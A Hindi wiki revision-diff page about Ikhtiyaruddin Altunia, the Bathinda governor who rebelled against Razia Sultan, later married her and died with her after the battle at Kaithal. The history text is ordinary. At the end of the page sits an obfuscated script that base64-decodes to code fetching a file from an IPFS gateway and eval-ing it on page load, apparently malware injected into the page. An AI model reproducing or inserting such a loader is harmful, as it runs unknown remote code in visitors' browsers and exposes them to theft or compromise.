Difference between revisions of "इख़्तियारुद्दीन अल्तूनिया"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('*रज़िया सुल्तान (1236-40 ई.) के शासन काल के प्रारम्भ में य...' के साथ नया पन्ना बनाया)
 
 
(5 intermediate revisions by 3 users not shown)
Line 1: Line 1:
*[[रज़िया सुल्तान]] (1236-40 ई.) के शासन काल के प्रारम्भ में यह [[भटिण्डा]] का हाक़िम था।
+
*[[रज़िया सुल्तान]] (1236-40 ई.) के शासन काल के प्रारम्भ में '''इख़्तियारुद्दीन अल्तूनिया''' [[भटिण्डा]] का हाक़िम था।
*उसने 1240 ई. में रज़िया के ख़िलाफ़ बग़ावत कर दी, उसे परास्त कर दिया और बन्दी बना लिया।
+
*उसने 1240 ई. में रज़िया के ख़िलाफ़ बगावत कर दी थी।
 +
*इख़्तियारुद्दीन ने रज़िया को परास्त कर दिया और बाद में उसे बन्दी बना लिया गया।
 
*परन्तु उसे अपने इस कार्य के लिए बहराम से, जो नया सुल्तान बना था, यथेष्ट पुरस्कार नहीं मिला।
 
*परन्तु उसे अपने इस कार्य के लिए बहराम से, जो नया सुल्तान बना था, यथेष्ट पुरस्कार नहीं मिला।
 
*इसलिए उसने रज़िया को जेलख़ाने से रिहा कर दिया और उससे शादी कर ली।
 
*इसलिए उसने रज़िया को जेलख़ाने से रिहा कर दिया और उससे शादी कर ली।
*उसने रज़िया को फिर से गद्दी पर बिठाने के लिए एक बड़ी सेना के साथ दिल्ली पर आक्रमण किया।
+
*उसने रज़िया को फिर से गद्दी पर बिठाने के लिए एक बड़ी सेना के साथ [[दिल्ली]] पर आक्रमण किया था।
*परन्तु वह कैथल की लड़ाई में पराजित हो गया और दूसरे दिन उसे व रज़िया को मार डाला गया।
+
*वह और रज़िया [[कैथल]] की लड़ाई में पराजित हो गए और दूसरे दिन उसे व रज़िया को मार डाला गया।
  
 +
{{प्रचार}}
 
{{लेख प्रगति
 
{{लेख प्रगति
|आधार=आधार1
+
|आधार=
|प्रारम्भिक=
+
|प्रारम्भिक=प्रारम्भिक1
 
|माध्यमिक=
 
|माध्यमिक=
 
|पूर्णता=
 
|पूर्णता=
 
|शोध=
 
|शोध=
 
}}
 
}}
 +
{{संदर्भ ग्रंथ}}
 
==टीका टिप्पणी और संदर्भ==
 
==टीका टिप्पणी और संदर्भ==
 
<references/>
 
<references/>
[[Category:नया पन्ना]]
+
==संबंधित लेख==
 +
{{मध्य काल}}
 +
[[Category:मध्य काल]]
 +
[[Category:इतिहास कोश]]
 
__INDEX__
 
__INDEX__

Latest revision as of 07:01, 23 April 2011

  • raziya sultan (1236-40 ee.) ke shasan kal ke prarambh mean ikhtiyaruddin altooniya bhatinda ka haqim tha.
  • usane 1240 ee. mean raziya ke khilaf bagavat kar di thi.
  • ikhtiyaruddin ne raziya ko parast kar diya aur bad mean use bandi bana liya gaya.
  • parantu use apane is kary ke lie baharam se, jo naya sultan bana tha, yathesht puraskar nahian mila.
  • isalie usane raziya ko jelakhane se riha kar diya aur usase shadi kar li.
  • usane raziya ko phir se gaddi par bithane ke lie ek b di sena ke sath dilli par akraman kiya tha.
  • vah aur raziya kaithal ki l daee mean parajit ho ge aur doosare din use v raziya ko mar dala gaya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>